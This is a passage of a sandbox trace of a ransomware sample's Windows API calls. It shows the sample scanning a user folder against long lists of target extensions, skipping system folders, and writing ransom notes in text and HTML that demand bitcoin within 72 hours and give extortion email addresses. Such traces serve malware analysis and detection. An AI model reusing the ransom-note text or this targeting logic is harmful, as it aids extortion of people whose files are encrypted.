cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".lnk") returned 0x0
	[0190.286] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1
	[0190.286] lstrcmpW (lpString1="Downloads.lnk", lpString2="..") returned 1
	[0190.287] lstrcmpW (lpString1="Downloads.lnk", lpString2=".") returned 1
	[0190.287] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Links\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\") returned="C:\\Users\\RDhJ0CNFevzX\\Links\\"
	[0190.287] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\", lpString2="Downloads.lnk" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk") returned="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk"
	[0190.287] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk") returned 41
	[0190.287] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.287] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk", cchLength=0x29 | out: lpsz="c:\\users\\rdhj0cnfevzx\\links\\downloads.lnk") returned 0x29
	[0190.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.287] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\downloads.lnk", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.287] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\links\\downloads.lnk" | out: lpString1="c:\\users\\rdhj0cnfevzx\\links\\downloads.lnk") returned="c:\\users\\rdhj0cnfevzx\\links\\downloads.lnk"
	[0190.287] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\links\\downloads.lnk") returned 41
	[0190.287] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.288] StrStrW (lpFirst=".lnk", lpSrch=".") returned=".lnk"
	[0190.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.288] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".lnk") returned 0x0
	[0190.288] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 0
	[0190.288] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0190.288] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0190.289] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Links" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links") returned="C:\\Users\\RDhJ0CNFevzX\\Links"
	[0190.289] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Links\\*.*"
	[0190.289] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.289] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.289] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Links\\HELP_DECRYPT_YOUR_FILES.TXT") returned 55
	[0190.289] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.290] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0190.290] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0190.291] CloseHandle (hObject=0x380) returned 1
	[0190.291] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.291] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.291] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0190.293] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0190.293] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.293] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0190.293] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0190.293] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0190.293] CloseHandle (hObject=0x380) returned 1
	[0190.294] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.294] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.294] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0190.294] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Links\\HELP_DECRYPT_YOUR_FILES.HTML") returned 56
	[0190.294] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.312] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0190.312] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0190.314] CloseHandle (hObject=0x380) returned 1
	[0190.314] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.314] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.342] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0190.343] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0190.343] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.343] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0190.343] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0190.344] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0190.344] CloseHandle (hObject=0x380) returned 1
	[0190.344] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8af62deb, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0190.344] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Links\\*.*") returned 31
	[0190.344] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.345] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Links\\*.*", cchLength=0x1f | out: lpsz="c:\\users\\rdhj0cnfevzx\\links\\*.*") returned 0x1f
	[0190.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.345] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="windows") returned 0x0
	[0190.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.345] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="boot") returned 0x0
	[0190.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.345] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="system volume information") returned 0x0
	[0190.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.346] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0190.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.346] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="temp") returned 0x0
	[0190.350] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.350] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="program files") returned 0x0
	[0190.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.351] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="program files (x86)") returned 0x0
	[0190.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.351] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="appdata") returned 0x0
	[0190.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.351] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="application data") returned 0x0
	[0190.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.352] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="winnt") returned 0x0
	[0190.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.352] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="tmp") returned 0x0
	[0190.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.352] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="cache") returned 0x0
	[0190.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.352] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="temporary internet files") returned 0x0
	[0190.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.352] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="webcache") returned 0x0
	[0190.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.353] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="inetcache") returned 0x0
	[0190.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.353] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="nvidia") returned 0x0
	[0190.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.353] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="packages") returned 0x0
	[0190.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.354] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="cookies") returned 0x0
